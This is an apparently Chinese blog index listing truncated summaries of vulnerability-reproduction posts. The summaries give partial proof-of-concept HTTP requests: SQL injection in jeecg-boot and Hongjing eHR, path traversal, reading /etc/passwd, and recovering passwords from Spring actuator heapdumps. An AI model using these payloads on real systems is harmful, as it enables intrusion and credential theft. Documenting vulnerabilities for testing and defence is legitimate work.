摘要: 漏洞复现: POC: POST /uapws/soapFormat.ajax HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 阅读全文
posted @ 2024-06-26 16:21 都吃泡芙 阅读(208) 评论(0) 推荐(0)
摘要: 影响范围: 3.0.0 <= jeecg-boot <= 3.5.3 2.4.x <= jeecg-boot <= 2.4.6 POC: POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1 Host: ip Pragma: no-cache Cach 阅读全文
posted @ 2024-06-22 14:07 都吃泡芙 阅读(888) 评论(0) 推荐(1)
摘要: 漏洞复现: POC: POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/ 阅读全文
posted @ 2024-06-14 16:23 都吃泡芙 阅读(162) 评论(0) 推荐(0)
摘要: 漏洞复现: poc: POST /templates/attestation/../../pos/roleinfo/pos_dept_post HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW 阅读全文
posted @ 2024-06-13 14:33 都吃泡芙 阅读(185) 评论(0) 推荐(0)
摘要: 漏洞复现: 1、读取/etc/passwd http:url/servlet/OutputCode?path=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP 其中path字段加密通过下面工具来实现 工具地址:https://github. 阅读全文
posted @ 2024-06-12 09:22 都吃泡芙 阅读(283) 评论(0) 推荐(0)
摘要: 适用范围:宏景eHR < 8.2 登录页面 查询cusername: /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2 阅读全文
posted @ 2024-06-06 18:02 都吃泡芙 阅读(87) 评论(0) 推荐(0)
摘要: 一、查看加密星号信息(适用于数据库密码、ftp、ssh) 1.首先访问地址:http://url/actuator/env 出现一些配置信息,搜索带有****** 可以看到ftp的ip,username,password 2.接着访问http://url/actuator/heapdump 下载下来 阅读全文
posted @ 2024-06-06 11:38 都吃泡芙 阅读(568) 评论(2) 推荐(1)
//雪花飘落效果 //雪花飘落效果